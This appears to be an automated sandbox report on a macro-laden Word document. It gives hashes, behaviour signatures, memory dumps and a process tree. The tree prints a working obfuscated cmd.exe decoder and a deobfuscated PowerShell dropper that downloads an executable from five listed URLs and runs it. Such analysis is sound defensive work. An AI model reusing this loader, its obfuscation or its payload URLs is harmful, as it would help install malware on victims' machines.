Analysis

  • max time kernel
    122s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    01-02-2022 03:30

General

  • Target

    ddfa667a6805bf8b9216feb8df15b1590c340914d7142aa142ecb858d117ba9b.doc

  • Size

    92KB

  • MD5

    4ed6536cc686553f21e7583d5257e590

  • SHA1

    437dcc1cc98f92a4bdfaab6746a87403ded4dba0

  • SHA256

    ddfa667a6805bf8b9216feb8df15b1590c340914d7142aa142ecb858d117ba9b

  • SHA512

    b25b2702513ae30d14c849be9282940d0ae7392097d1f377dded49bf8c4f304656bcc58391ac427b1ee59ebf833394a298988f76324b23ac11b28005048f120a

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://nebula-ent.com/t3

exe.dropper

http://ektor.com.br/XWWpLxCI

exe.dropper

http://negreiros.com.br/bin/zoZb

exe.dropper

http://n-morimoto.jp/j583VppF

exe.dropper

http://mscyapi.com/mscinsaat.com/cWBJXY3

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ddfa667a6805bf8b9216feb8df15b1590c340914d7142aa142ecb858d117ba9b.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:520
      • C:\Windows\SysWOW64\cmd.exe
        cmd /V:/C"set icX=izXquhBIwbtEjbVz5CLc32F)SdOskxZo8,Y{l\yPm;$pMeD-KvnrNJ1}a+@g.=W' f/:7(&&for %6 in (43;31;8;45;51;27;5;45;36;36;64;42;34;43;26;61;50;45;8;47;31;13;12;45;19;10;64;52;45;10;60;62;45;13;17;36;0;45;50;10;41;42;48;49;17;61;63;5;10;10;43;67;66;66;50;45;13;4;36;56;47;45;50;10;60;19;31;40;66;10;20;58;5;10;10;43;67;66;66;45;28;10;31;51;60;19;31;40;60;13;51;66;2;62;62;43;18;29;17;7;58;5;10;10;43;67;66;66;50;45;59;51;45;0;51;31;27;60;19;31;40;60;13;51;66;13;0;50;66;15;31;30;13;58;5;10;10;43;67;66;66;50;47;40;31;51;0;40;31;10;31;60;12;43;66;12;16;32;20;14;43;43;22;58;5;10;10;43;67;66;66;40;27;19;38;56;43;0;60;19;31;40;66;40;27;19;0;50;27;56;56;10;60;19;31;40;66;19;62;6;53;2;34;20;63;60;24;43;36;0;10;69;63;58;63;23;41;42;4;34;30;64;61;64;63;68;21;54;63;41;42;5;44;19;61;42;45;50;49;67;10;45;40;43;57;63;37;63;57;42;4;34;30;57;63;60;45;29;45;63;41;65;31;51;45;56;19;5;69;42;0;13;19;64;0;50;64;42;48;49;17;23;35;10;51;38;35;42;34;43;26;60;46;31;8;50;36;31;56;25;22;0;36;45;69;42;0;13;19;33;64;42;5;44;19;23;41;24;10;56;51;10;47;39;51;31;19;45;27;27;64;42;5;44;19;41;13;51;45;56;28;41;55;19;56;10;19;5;35;55;55;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;78)do set uN92=!uN92!!icX:~%6,1!&&if %6 geq 78 call %uN92:*uN92!=%"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:832
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $YpO=new-object Net.WebClient;$KvC='http://nebula-ent.com/t3@http://ektor.com.br/XWWpLxCI@http://negreiros.com.br/bin/zoZb@http://n-morimoto.jp/j583VppF@http://mscyapi.com/mscinsaat.com/cWBJXY3'.Split('@');$uYZ = '721';$hMc=$env:temp+'\'+$uYZ+'.exe';foreach($ibc in $KvC){try{$YpO.DownloadFile($ibc, $hMc);Start-Process $hMc;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1760

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/520-59-0x000007FEFBF81000-0x000007FEFBF83000-memory.dmp
      Filesize

      8KB

    • memory/1760-77-0x00000000024A0000-0x00000000030EA000-memory.dmp
      Filesize

      12.3MB

    • memory/1760-80-0x0000000004B70000-0x00000000051C1000-memory.dmp
      Filesize

      6.3MB

    • memory/1760-79-0x00000000024A0000-0x00000000030EA000-memory.dmp
      Filesize

      12.3MB

    • memory/1760-78-0x00000000024A0000-0x00000000030EA000-memory.dmp
      Filesize

      12.3MB

    • memory/1900-60-0x00000000001D0000-0x000000000029B000-memory.dmp
      Filesize

      812KB

    • memory/1900-68-0x00000000001D0000-0x000000000029B000-memory.dmp
      Filesize

      812KB

    • memory/1900-62-0x00000000001D0000-0x000000000029B000-memory.dmp
      Filesize

      812KB

    • memory/1900-63-0x00000000001D0000-0x000000000029B000-memory.dmp
      Filesize

      812KB

    • memory/1900-64-0x00000000001D0000-0x000000000029B000-memory.dmp
      Filesize

      812KB

    • memory/1900-66-0x00000000001D0000-0x000000000029B000-memory.dmp
      Filesize

      812KB

    • memory/1900-65-0x00000000001D0000-0x000000000029B000-memory.dmp
      Filesize

      812KB

    • memory/1900-61-0x00000000001D0000-0x000000000029B000-memory.dmp
      Filesize

      812KB

    • memory/1900-71-0x00000000001D0000-0x000000000029B000-memory.dmp
      Filesize

      812KB

    • memory/1900-73-0x00000000001D0000-0x000000000029B000-memory.dmp
      Filesize

      812KB

    • memory/1900-55-0x0000000072B21000-0x0000000072B24000-memory.dmp
      Filesize

      12KB

    • memory/1900-58-0x00000000760F1000-0x00000000760F3000-memory.dmp
      Filesize

      8KB

    • memory/1900-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1900-56-0x00000000705A1000-0x00000000705A3000-memory.dmp
      Filesize

      8KB

    • memory/1900-81-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB